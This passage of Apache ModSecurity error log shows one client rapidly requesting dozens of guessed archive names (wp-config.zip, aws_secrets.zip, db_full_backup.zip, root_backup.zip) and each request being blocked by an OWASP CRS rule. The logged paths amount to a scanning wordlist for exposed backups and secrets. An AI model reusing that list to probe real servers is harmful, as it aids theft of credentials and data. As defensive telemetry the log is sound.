"OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/2022-backup.zip"] [unique_id "aa2sJ3-dmvIeGeY060kimwAAAdQ"] [Sun Mar 08 19:04:39.778352 2026] [:error] [pid 13605:tid 13613] [client 35.189.151.148:60410] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/marketing.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfnwAAAMY"] [Sun Mar 08 19:04:39.778399 2026] [:error] [pid 13471:tid 13483] [client 35.189.151.148:60450] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_logs.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3_gAAAAg"] [Sun Mar 08 19:04:39.778409 2026] [:error] [pid 12902:tid 12956] [client 35.189.151.148:32826] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/division.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAqQAAApU"] [Sun Mar 08 19:04:39.778592 2026] [:error] [pid 11078:tid 11130] [client 35.189.151.148:60896] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.tmp.zip"] [unique_id "aa2sJ3-dmvIeGeY060kinAAAAdQ"] [Sun Mar 08 19:04:39.779025 2026] [:error] [pid 7010:tid 7050] [client 35.189.151.148:59984] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/pics.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-cQAAAY0"] [Sun Mar 08 19:04:39.780775 2026] [:error] [pid 13471:tid 13481] [client 35.189.151.148:44570] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/joomla-backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD3_wAAAAY"] [Sun Mar 08 19:04:39.781072 2026] [:error] [pid 13605:tid 13618] [client 35.189.151.148:43008] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/october.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfoAAAAMs"] [Sun Mar 08 19:04:39.781085 2026] [:error] [pid 11078:tid 11131] [client 35.189.151.148:38694] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/deploy.zip"] [unique_id "aa2sJ3-dmvIeGeY060kingAAAdU"] [Sun Mar 08 19:04:39.781090 2026] [:error] [pid 11078:tid 11125] [client 35.189.151.148:43460] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/root_backup.zip"] [unique_id "aa2sJ3-dmvIeGeY060kioAAAAc8"] [Sun Mar 08 19:04:39.781098 2026] [:error] [pid 11078:tid 11132] [client 35.189.151.148:40800] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/results.zip"] [unique_id "aa2sJ3-dmvIeGeY060kinQAAAdY"] [Sun Mar 08 19:04:39.781139 2026] [:error] [pid 11078:tid 11122] [client 35.189.151.148:43364] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/server.zip"] [unique_id "aa2sJ3-dmvIeGeY060kinwAAAcw"] [Sun Mar 08 19:04:39.781170 2026] [:error] [pid 13605:tid 13620] [client 35.189.151.148:41840] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_01012023.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfoQAAAM0"] [Sun Mar 08 19:04:39.781262 2026] [:error] [pid 13471:tid 13475] [client 35.189.151.148:43116] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/db_full_backup.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4AAAAAAA"] [Sun Mar 08 19:04:39.781276 2026] [:error] [pid 13471:tid 13496] [client 35.189.151.148:42652] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/old_files.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4AQAAABU"] [Sun Mar 08 19:04:39.781357 2026] [:error] [pid 11078:tid 11111] [client 35.189.151.148:41744] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/pre_update.zip"] [unique_id "aa2sJ3-dmvIeGeY060kioQAAAcE"] [Sun Mar 08 19:04:39.781402 2026] [:error] [pid 13472:tid 13505] [client 35.189.151.148:39830] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.backup.zip"] [unique_id "aa2sJ13UyizU6P-l0YL81AAAAEM"] [Sun Mar 08 19:04:39.781445 2026] [:error] [pid 13472:tid 13509] [client 35.189.151.148:43480] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/prototype.zip"] [unique_id "aa2sJ13UyizU6P-l0YL81QAAAEY"] [Sun Mar 08 19:04:39.781449 2026] [:error] [pid 13471:tid 13485] [client 35.189.151.148:39782] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/staff.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4AgAAAAo"] [Sun Mar 08 19:04:39.781530 2026] [:error] [pid 13471:tid 13476] [client 35.189.151.148:38368] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_3.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4AwAAAAE"] [Sun Mar 08 19:04:39.781631 2026] [:error] [pid 13472:tid 13521] [client 35.189.151.148:43448] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/export_backup.zip"] [unique_id "aa2sJ13UyizU6P-l0YL81gAAAE4"] [Sun Mar 08 19:04:39.781682 2026] [:error] [pid 13472:tid 13528] [client 35.189.151.148:38698] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/docs.zip"] [unique_id "aa2sJ13UyizU6P-l0YL81wAAAFE"] [Sun Mar 08 19:04:39.781724 2026] [:error] [pid 13471:tid 13475] [client 35.189.151.148:41750] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/testing.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4BAAAAAA"] [Sun Mar 08 19:04:39.781763 2026] [:error] [pid 13472:tid 13539] [client 35.189.151.148:43752] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws.zip"] [unique_id "aa2sJ13UyizU6P-l0YL82AAAAFY"] [Sun Mar 08 19:04:39.781907 2026] [:error] [pid 13472:tid 13505] [client 35.189.151.148:37088] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/system.zip"] [unique_id "aa2sJ13UyizU6P-l0YL82QAAAEM"] [Sun Mar 08 19:04:39.781977 2026] [:error] [pid 13472:tid 13523] [client 35.189.151.148:43326] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_secrets.zip"] [unique_id "aa2sJ13UyizU6P-l0YL82wAAAE8"] [Sun Mar 08 19:04:39.781996 2026] [:error] [pid 13472:tid 13509] [client 35.189.151.148:43578] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_2025.zip"] [unique_id "aa2sJ13UyizU6P-l0YL83AAAAEY"] [Sun Mar 08 19:04:39.782106 2026] [:error] [pid 13472:tid 13511] [client 35.189.151.148:44734] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-lambda.zip"] [unique_id "aa2sJ13UyizU6P-l0YL83QAAAEg"] [Sun Mar 08 19:04:39.782109 2026] [:error] [pid 13472:tid 13510] [client 35.189.151.148:40570] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/miscellaneous.zip"] [unique_id "aa2sJ13UyizU6P-l0YL82gAAAEc"] [Sun Mar 08 19:04:39.782206 2026] [:error] [pid 13472:tid 13528] [client 35.189.151.148:41148] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_internal.zip"] [unique_id "aa2sJ13UyizU6P-l0YL83gAAAFE"] [Sun Mar 08 19:04:39.782250 2026] [:error] [pid 13472:tid 13513] [client 35.189.151.148:38354] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/bak.zip"] [unique_id "aa2sJ13UyizU6P-l0YL83wAAAEo"] [Sun Mar 08 19:04:39.782366 2026] [:error] [pid 13473:tid 13520] [client 35.189.151.148:37550] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6GQAAAIM"] [Sun Mar 08 19:04:39.782430 2026] [:error] [pid 13472:tid 13535] [client 35.189.151.148:43078] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/design_assets.zip"] [unique_id "aa2sJ13UyizU6P-l0YL84AAAAFQ"] [Sun Mar 08 19:04:39.782433 2026] [:error] [pid 13472:tid 13507] [client 35.189.151.148:41890] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/legacy_system.zip"] [unique_id "aa2sJ13UyizU6P-l0YL84QAAAEU"] [Sun Mar 08 19:04:39.782436 2026] [:error] [pid 13473:tid 13543] [client 35.189.151.148:43274] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/2023_backup.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6GAAAAJA"] [Sun Mar 08 19:04:39.782476 2026] [:error] [pid 13473:tid 13515] [client 35.189.151.148:43464] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/temp_backup.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6GgAAAIE"] [Sun Mar 08 19:04:39.782499 2026] [:error] [pid 13472:tid 13504] [client 35.189.151.148:42870] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/opencart.zip"] [unique_id "aa2sJ13UyizU6P-l0YL84gAAAEI"] [Sun Mar 08 19:04:39.782555 2026] [:error] [pid 13473:tid 13526] [client 35.189.151.148:59942] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/compiled.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6GwAAAIY"] [Sun Mar 08 19:04:39.782642 2026] [:error] [pid 12902:tid 12945] [client 35.189.151.148:39162] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/restricted.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAqgAAAoo"] [Sun Mar 08 19:04:39.782693 2026] [:error] [pid 13471:tid 13485] [client 35.189.151.148:38754] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/correspondence.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD4BQAAAAo"] [Sun Mar 08 19:04:39.782742 2026] [:error] [pid 13605:tid 13614] [client 35.189.151.148:43792] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_all.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfogAAAMc"] [Sun Mar 08 19:04:39.782745 2026] [:error] [pid 12902:tid 12952] [client 35.189.151.148:44694] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] 